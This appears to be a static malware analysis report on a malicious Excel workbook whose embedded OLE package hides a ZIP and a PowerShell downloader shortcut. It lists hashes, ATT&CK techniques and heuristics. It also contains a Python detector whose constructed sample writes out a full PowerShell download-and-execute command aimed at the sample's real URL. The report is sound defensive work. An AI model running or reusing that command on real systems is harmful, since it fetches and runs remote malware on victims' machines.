Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0a31a6b920b9fac5…

MALICIOUS

Office (OOXML)

Size: 17.9 KB
Created: 2018-11-03 15:16:32 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2019-09-30
MD5: aaad699964d8f55d1cfd12bcbcc40192
SHA-1: 9e26ad999517fab78353e888fc2b32cdf7df0964
SHA-256: 0a31a6b920b9fac5d8a2a8cc1d2c6cd3f7334d4e96eefd23edd4b57f1570c6ef
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.001 PowerShell
  • T1204.002 Malicious File

The sample is an Excel (OOXML) workbook containing an embedded OLE Package object (xl/embeddings/oleObject1.bin) whose Ole10Native payload is a ZIP archive, Crypto-Alarm.zip, with its original path recorded as C:\Users\r\AppData\Local\Temp\Crypto-Alarm.zip. The archive contains a Windows shortcut (CryptoAlarm-scanner.lnk) whose command line launches PowerShell to download and execute a second-stage payload from http://bit.ly/ASCAN. Nothing runs until the user opens the package from the document (T1204.002); the analysis assesses that the second stage likely establishes persistence via the Startup folder, but no second-stage artifact appears among the files extracted below, since the download was not performed during static analysis.

Heuristics (4)

  • critical OFFICE_PACKAGE_ARCHIVE_RISKY_MEMBER: Ole10Native package archive contains executable member
    The OLE Package payload is an archive that contains a shortcut, script, installer, or other executable-capable member. Embedding a ZIP whose contents execute when the user opens them is a direct Office package dropper pattern.
  • critical OFFICE_PACKAGE_ARCHIVE_LNK_DOWNLOADER: Ole10Native package archive contains PowerShell downloader LNK
    The OLE Package payload is an archive containing a Windows shortcut whose command line launches PowerShell and downloads a remote payload. This is direct user-execution malware delivery through Object Packager; the shortcut does nothing until it is run, and the sample does not rely on a Windows Shell icon-parsing exploit.
  • medium OOXML_OLE_OBJECT: Embedded OLE object
    The document contains an embedded OLE object.
  • info EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://bit.ly/ASCAN (channel: embedded OLE package script)
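The two package-archive heuristics above can be reproduced over the Ole10Native stream itself. The following is an added example, not the report tool's own code: it parses the Package stream body (size, type, label, original path, flags, temp path, data), checks whether the payload is a ZIP, flags members whose extension can execute on open, and, for .lnk members, scans both the byte-string and UTF-16LE decodings for a PowerShell command line carrying a URL. Extracting the stream from the compound-file container (xl/embeddings/oleObject1.bin) is out of scope here; in practice you would pull the \x01Ole10Native stream with a CFB parser such as olefile. The sample Ole10Native blob, the ZIP and the LNK-like member (header magic plus a UTF-16LE command line, not a real shortcut) are all constructed inline so the block runs offline; only the archive name, original path, LNK name and URL are taken from this report.

```python
import io
import re
import struct
import zipfile

# Extensions that execute on open, as in the RISKY_MEMBER heuristic (assumed list).
RISKY_EXTS = {".lnk", ".exe", ".scr", ".js", ".jse", ".vbs", ".vbe", ".ps1",
              ".bat", ".cmd", ".hta", ".msi", ".wsf", ".dll"}
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.IGNORECASE)


def build_ole10native(label, src_path, payload, temp_path=b""):
    """Assemble a Package (\\x01Ole10Native) stream: u32 size of the rest, u16 type,
    NUL-terminated label, NUL-terminated original path, u32 flags, u32 temp-path
    length, temp path (NUL-terminated), u32 data length, data."""
    body = struct.pack("<H", 2)
    body += label.encode() + b"\x00"
    body += src_path.encode() + b"\x00"
    body += struct.pack("<I", 0x00030000)
    tp = temp_path + b"\x00"
    body += struct.pack("<I", len(tp)) + tp
    body += struct.pack("<I", len(payload)) + payload
    return struct.pack("<I", len(body)) + body


def parse_ole10native(stream):
    """Return (display_name, full_path, temp_path, payload) from a Package stream."""
    (total,) = struct.unpack_from("<I", stream, 0)
    if total != len(stream) - 4:
        raise ValueError("Ole10Native size field does not match stream length")
    pos = 6                                   # skip size (4) and type (2)
    end = stream.index(b"\x00", pos)
    label = stream[pos:end].decode("latin-1")
    pos = end + 1
    end = stream.index(b"\x00", pos)
    full_path = stream[pos:end].decode("latin-1")
    pos = end + 5                             # NUL plus the u32 flags field
    (tp_len,) = struct.unpack_from("<I", stream, pos)
    pos += 4
    temp_path = stream[pos:pos + tp_len].rstrip(b"\x00").decode("latin-1")
    pos += tp_len
    (data_len,) = struct.unpack_from("<I", stream, pos)
    pos += 4
    payload = stream[pos:pos + data_len]
    if len(payload) != data_len:
        raise ValueError("truncated Ole10Native payload")
    return label, full_path, temp_path, payload


def scan_package_archive(stream):
    """Apply the RISKY_MEMBER and LNK_DOWNLOADER heuristics to one Package stream."""
    label, full_path, temp_path, payload = parse_ole10native(stream)
    result = {"display_name": label, "full_path": full_path, "temp_path": temp_path,
              "risky_members": [], "urls": [], "flags": []}
    if not payload.startswith(b"PK\x03\x04"):   # ZIP local file header magic
        return result                            # not an archive; other rules apply
    with zipfile.ZipFile(io.BytesIO(payload)) as zf:
        for info in zf.infolist():
            ext = "." + info.filename.rsplit(".", 1)[-1].lower() if "." in info.filename else ""
            if ext in RISKY_EXTS:
                result["risky_members"].append(info.filename)
            if ext == ".lnk":
                data = zf.read(info)
                if data[:4] != b"L\x00\x00\x00":  # ShellLinkHeader: HeaderSize 0x4C
                    continue
                # LNK stores its arguments as UTF-16LE when the Unicode flag is set,
                # so look at both decodings rather than trusting a byte search.
                for text in (data.decode("latin-1"), data.decode("utf-16-le", "replace")):
                    if "powershell" in text.lower():
                        result["urls"].extend(URL_RE.findall(text))
    result["urls"] = sorted(set(result["urls"]))
    if result["risky_members"]:
        result["flags"].append("OFFICE_PACKAGE_ARCHIVE_RISKY_MEMBER")
    if result["urls"]:
        result["flags"].append("OFFICE_PACKAGE_ARCHIVE_LNK_DOWNLOADER")
    return result


def build_sample():
    """Constructed stand-in for the carved artifact: a ZIP holding an LNK-like stub
    (76-byte header plus UTF-16LE command line) and a harmless text decoy.
    The PowerShell command line is assumed; the report does not reproduce it."""
    cmd = ("powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
           ".DownloadString('http://bit.ly/ASCAN')\"")
    lnk = b"L\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
    lnk = lnk.ljust(0x4C, b"\x00") + cmd.encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("CryptoAlarm-scanner.lnk", lnk)
        zf.writestr("readme.txt", "constructed decoy text file")
    return build_ole10native("Crypto-Alarm.zip",
                             r"C:\Users\r\AppData\Local\Temp\Crypto-Alarm.zip",
                             buf.getvalue())


if __name__ == "__main__":
    print(scan_package_archive(build_sample()))
```

The size check on the first field is deliberate: real-world Package streams are sometimes padded or truncated, and a mismatch there is itself worth surfacing rather than silently reading past the payload.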

Extracted artifacts (4)

Files carved from inside the sample during analysis.

  • ooxml_oleobject_00.bin
    Kind: ooxml-ole-object
    Source: OOXML embedded OLE part xl/embeddings/oleObject1.bin
    Size: 5120 bytes
    SHA-256: 317c2e2d755460fe4bf6e0b970de28fa9f47b9d96b90478aeb762c83a1c75e81
  • ooxml_oleobject_00_ole10native_00.bin
    Kind: ole-package
    Source: Ole10Native stream inside xl/embeddings/oleObject1.bin
    Size: 2637 bytes
    SHA-256: 8275b8d398b6669012a17000ae46fd5f458e12e39071a4da527fba9e7ca5bdd4
  • ooxml_oleobject_00_ole10native_00_Crypto-Alarm.zip
    Kind: ole-package-payload
    Source: Ole10Native payload inside xl/embeddings/oleObject1.bin (display_name=Crypto-Alarm.zip; full_path=C:\Users\r\AppData\Local\Temp\Crypto-Alarm.zip; temp_path=; def_file=)
    Size: 2313 bytes
    SHA-256: 221a269729d48388e20dca70dd388f536edd472eec545971ead990d3bf34c2a7
  • emf_00.emf
    Kind: ooxml-emf
    Source: OOXML EMF part xl/media/image1.emf
    Size: 5028 bytes
    SHA-256: b86eeef9003d1a4808d4009d3efceff1b325dd37b6db286cff5dcdf057c541c3